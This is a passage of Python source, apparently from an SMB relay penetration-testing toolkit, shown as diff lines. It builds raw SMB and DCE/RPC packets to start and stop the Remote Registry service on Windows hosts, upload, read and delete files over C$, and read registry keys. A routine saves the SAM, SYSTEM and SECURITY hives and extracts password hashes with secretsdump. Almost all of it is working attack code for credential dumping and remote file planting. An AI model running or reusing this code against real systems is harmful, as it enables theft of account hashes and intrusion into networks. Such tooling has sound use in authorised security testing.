s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - ##Error handling. - if data[8:10] == b"\x2e\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") - return ModifySMBRetCode(data) - - ## DCE/RPC SVCCTLOpenService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to create the service\n") - return ModifySMBRetCode(data) - #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) - #ContextHandlerService = data[88:108] - ContextHandler = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName="RemoteRegistry") - w.calculate() - x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLStartService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open the service.\n") - return ModifySMBRetCode(data) - ContextHandlerService = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLStartService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x13\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLQueryService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to start the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - time.sleep(3) - ## DCE/RPC SVCCTLCloseService - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to query the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, f - -########################### -#Stop Winreg Service -########################### -def StopWinregService(f, host, data, s): - ## DCE/RPC SVCCTLOpenManagerW. - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) - w.calculate() - x = SMBDCEPacketData(Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - ##Error handling. - if data[8:10] == b"\x2e\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") - return ModifySMBRetCode(data) - - ## DCE/RPC SVCCTLOpenService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to create the service\n") - return ModifySMBRetCode(data) - #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) - #ContextHandlerService = data[88:108] - ContextHandler = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName="RemoteRegistry") - w.calculate() - x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLStartService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to open the service.\n") - return ModifySMBRetCode(data) - ContextHandlerService = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x01\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLQueryService. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to stop the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC SVCCTLCloseService - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to query the service.\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, f - - -########################### -#Close a FID -########################### - -def CloseFID(f, data, s): - ##Close FID Request - if data[8:10] == b"\x25\x00": - head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = CloseRequest(FID = f.decode('latin-1')) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s - -def SMBDCERPCCloseFID(f, data, s): - ##Close FID Request - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = CloseRequest(FID = f.decode('latin-1')) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s - -########################### -#Open a file for reading -########################### - -def SMBOpenFile(Filename, Share, Host, Access, data, s): - if isinstance(data, str): - data.encode('latin-1') - ##Start with a Tree connect on C$ - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBTreeConnectData(Path="\\\\"+Host+"\\"+Share+"$") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ##OpenAndX. - if data[8:10] == b"\x75\x00": - head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = OpenAndX(File=Filename, OpenFunc="\x01\x00", Flags="\x07\x00", DesiredAccess=Access) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - if data[8:10] == b"\x2d\x22": - print("[+] Can't open the file, access is denied (write protected file?).") - f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. - #We'll recover that connection.. - return data, s, f - - if data[8:10] == b"\x2d\x43": - print("[+] Sharing violation, waiting a bit and attempting again.") - time.sleep(2) - head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = OpenAndX(File=Filename, OpenFunc="\x01\x00",DesiredAccess=Access) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - if data[8:10] == b"\x2d\x00":##Found all good. - f = data[41:43] - return data, s, f - - if data[8:10] == b"\x2d\x34":#not found - time.sleep(2)#maybe still processing the cmd. Be patient, then grab it again. - head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = OpenAndX(File=Filename, OpenFunc="\x01\x00") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ##OpenAndX. - if data[8:10] == b"\x2d\x34": - print("[+] The command failed or took to long to complete.") - return data, s - - ##all good. - if data[8:10] == b"\x2d\x00": - f = data[41:43] - return data, s, f - -########################### -#Open a file for writing -########################### - -def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access, data, s): - if isinstance(data, str): - data = data.encode('latin-1') - ##Start with a Tree connect on C$ - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBTreeConnectData(Path="\\\\"+Host+"\\"+Share+"$") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ##NtCreate. - if data[8:10] == b"\x75\x00": - head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = SMBNTCreateData(FileName="Windows\\Temp\\"+Filename, CreateFlags="\x00\x00\x00\x00", AccessMask="\x96\x01\x03\x00",FileAttrib="\x20\x00\x00\x00", ShareAccess="\x00\x00\x00\x00", Disposition = "\x02\x00\x00\x00", CreateOptions="\x44\x00\x00\x00") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - if data[8:10] == b"\xa2\x22": - print("[+] Can't open the file, access is denied (write protected file?).") - f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. - #We'll recover that connection.. - return data, s, f - - if data[8:10] == b"\xa2\x35": - print("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename) - f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. - #We'll recover that connection.. - return data, s, f - - if data[8:10] == b"\xa2\x00":##Found, all good. - f = data[42:44] - return data, s, f - - ##OpenAndX. - if data[8:10] == b"\xa2\x34": - print("[+] The command failed or took to long to complete.") - return data, s - - ##all good. - if data[8:10] == b"\xa2\x00": - f = data[41:43] - return data, s, f -########################### -#Open an IPC$ channel. -########################### - -def SMBOpenPipe(Host, data, s): - if isinstance(data, str): - data = data.encode('latin-1') - else: - pass - ##Start with a Tree connect on IPC$ - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s - -########################### -#Close a TID -########################### - -def CloseTID(data, s): - ##Start with a Tree connect on IPC$ - head = SMBHeader(cmd="\x71",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBTreeDisconnect() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s - -########################### -#Read then delete it. -########################### -def GrabAndRead(f, Filename, data, s): - ##ReadRequest. - if data[8:10] == b"\x2d\x00": - ##grab the filesize from the OpenAndX response. - filesize = struct.unpack(" 65520. - first = filesize-65520 - if first <= 65520: - count_number = 1 - else: - count_number = int(first/65520)+1 - count = 0 - dataoffset = 0 - bar = 80 - for i in range(count_number): - count = count+1 - alreadydone = int(round(80 * count / float(count_number))) - pourcent = round(100.0 * count / float(count_number), 1) - progress = '=' * alreadydone + '-' * (80 - alreadydone) - sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%')) - sys.stdout.flush() - dataoffset = dataoffset + 65520 - data, s, out = ReadOutput(StructWithLenPython2or3("60: - minutes = Seconds/60 - print('Downloaded in: %.3g minutes.'%(minutes)) - if Seconds<60: - print('Downloaded in: %.3g seconds'%(Seconds)) - if isinstance(data, str): - data = data.encode('latin-1') - - ##Close Request - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = CloseRequest(FID = f.decode('latin-1')) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, Output - -########################### -#Write it. -########################### -def UploadAndWrite(f, FileSize, FileContent, data, s): - ##WriteRequest for a small file. - if data[8:10] == b"\xa2\x00" and int(FileSize) <= 29999: - head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") - t = SMBWriteData(FID=f.decode('latin-1'), Data=FileContent) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - ##WriteRequest for a big file. - if data[8:10] == b"\xa2\x00" and int(FileSize) >= 30000: - ##How many requests? - count_number = int(FileSize/30000)+1 - #Do progress bar for large uploads, so the pentester doesn't fall asleep while doing a large SMB write operations.. - dataoffset = 0 - count = 0 - bar = 80 - start_time = time.time() - print('File size: %s'%(GetReadableSize(FileSize))) - for i in range(count_number): - count = count+1 - Chunk = FileContent[dataoffset:dataoffset+30000] - alreadydone = int(round(80 * count / float(count_number))) - pourcent = round(100.0 * count / float(count_number), 1) - progress = '=' * alreadydone + '-' * (80 - alreadydone) - sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%')) - sys.stdout.flush() - - if len(Chunk) == 0: - pass - else: - data, s = WriteOutput(StructWithLenPython2or3("60: - minutes = Seconds/60 - print('Uploaded in: %.3g minutes.'%(minutes)) - if Seconds<60: - print('Uploaded in: %.3g seconds'%(Seconds)) - - ##Close Request - if data[8:10] == b"\x2f\x00": - head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = CloseRequest(FID = f.decode('latin-1')) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s - -########################### -#Read then delete it. -########################### -def ReadAndDelete(f, Filename, data, s): - ##ReadRequest. - if data[8:10] == b"\x2d\x00": - filesize = struct.unpack(" 65520. - first = filesize-65520 - if first <= 65520: - count_number = 1 - else: - count_number = int(first/65520)+1 - count = 0 - dataoffset = 0 - bar = 80 - for i in range(count_number): - count = count+1 - alreadydone = int(round(80 * count / float(count_number))) - pourcent = round(100.0 * count / float(count_number), 1) - progress = '=' * alreadydone + '-' * (80 - alreadydone) - sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%')) - sys.stdout.flush() - dataoffset = dataoffset + 65520 - data, s, out = ReadOutput(StructWithLenPython2or3("60: - minutes = Seconds/60 - print('Downloaded in: %.3g minutes.\n'%(minutes)) - if Seconds<60: - print('Downloaded in: %.3g seconds'%(Seconds)) - if isinstance(data, str): - data = data.encode('latin-1') - - - ##Close Request - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = CloseRequest(FID = f.decode('latin-1')) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ##DeleteFileRequest. - if data[8:10] == b"\x04\x00": - head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00") - t = DeleteFileRequest(File=Filename) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - if data[8:10] == b"\x06\x00": - head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = OpenAndX(File=Filename, OpenFunc="\x01\x00") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, Output - -def DeleteAFile(Filename, data, s, Host): - ##Start with a Tree connect on C$ - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBTreeConnectData(Path="\\\\"+Host+"\\C$") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ##DeleteFileRequest. - if data[8:10] == b"\x75\x00": - head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00") - t = DeleteFileRequest(File=Filename) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - if data[8:10] == b"\x06\x21": - time.sleep(1) - head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00") - t = DeleteFileRequest(File=Filename) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - if data[8:10] == b"\x06\x21": - print("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.") - print("[+] Try taskkill /F /IM process_name, then delete the file.") - return data, s - - if data[8:10] == b"\x06\x34": - print("[+] Delete Failed. File not found.") - return data, s - - if data[8:10] == b"\x06\x00": - head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") - t = OpenAndX(File=Filename, OpenFunc="\x01\x00") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s - -def GrabKeyValue(s, f, handler, data, keypath): - ## DCE/RPC OpenKey. - if data[8:10] == b"\x25\x00": - ContextHandler = handler - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCEWinRegOpenKey(ContextHandle=ContextHandler,Key=keypath) - w.calculate() - x = SMBDCEPacketData(Opnum="\x0f\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC Query Info. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to read the key\n") - return ModifySMBRetCode(data) - ContextHandler = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCEWinRegQueryInfoKey(ContextHandle=ContextHandler) - x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - Value = data[104:120].decode('utf-16le') - - ## DCE/RPC CloseKey. - if data[8:10] == b"\x25\x00": - if data[len(data)-4:] == b"\x05\x00\x00\x00": - print("[+] Failed to close the key\n") - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler) - x = SMBDCEPacketData(Opnum="\x05\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return Value, data - -def SaveKeyToFile(Filename, Key, handler, f, data, s): - ## DCE/RPC WinReg Create Key. - if data[8:10] == b"\x25\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCEWinRegCreateKey(ContextHandle=handler, KeyName = Key) - w.calculate() - x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## DCE/RPC WinReg Save Key. - if data[8:10] == b"\x25\x00": - ContextHandler = data[84:104].decode('latin-1') - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCEWinRegSaveKey(ContextHandle=ContextHandler, File=Filename) - w.calculate() - x = SMBDCEPacketData(Opnum="\x14\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - return data, s, f - - -def OpenHKLM(data, s, f): - ## DCE/RPC WinReg OpenHKLM. - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCEWinRegOpenHKLMKey() - x = SMBDCEPacketData(Opnum="\x02\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - handler = data[84:104].decode('latin-1') - return data, s, handler, f - - -def OpenHKCU(data, s, f): - ## DCE/RPC WinReg OpenHKCU. - if data[8:10] == b"\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - w = SMBDCEWinRegOpenHKCUKey() - x = SMBDCEPacketData(Opnum="\x04\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - handler = data[84:104].decode('latin-1') - return data, s, handler, f - -def ConvertValuesToBootKey(JDSkew1GBGData): - JDSkew1GBGData = JDSkew1GBGData.decode('latin-1') - Key = "" - Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7] - for i in range(len(JDSkew1GBGData)): - Key += JDSkew1GBGData[Xored[i]] - print('BootKey: %s' % codecs.encode(Key.encode('latin-1'), 'hex').decode('latin-1')) - return Key - -##########Dump Hashes############# -def DumpHashes(data, s, Host): - - try: - SaveAKey(data, s, Host, "SAM") - time.sleep(0.5) - SaveAKey(data, s, Host, "SYSTEM") - time.sleep(0.5) - SaveAKey(data, s, Host, "SECURITY") - time.sleep(0.5) - #Let's call secretsdump.py - print("[+] Calling SecretsDump\n") - Hashes = DumpSecrets(None, None, None, None) - Results = Hashes.dump(sam=SaveSam_Path+"./"+Host+"-SAM.tmp", security=SaveSam_Path+"./"+Host+"-SECURITY.tmp", system=SaveSam_Path+"./"+Host+"-SYSTEM.tmp", outfile=SaveSam_Path+"./"+Host) - - print("[+] The hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt") - return data - - except: - #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. - return ModifySMBRetCode(data) - -##########Save An HKLM Key And Its Subkeys############# -def SaveAKey(data, s, Host, Key): - - try: - stopped = False - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - - if f == "PipeNotAvailable": - print("The Windows Remote Registry Service is sleeping, waking it up...") - time.sleep(3) - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - - if f == "PipeNotAvailable": - print("Retrying...") - time.sleep(5) - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - - if f == "ServiceNotFound": - stopped = True - data,s,f = 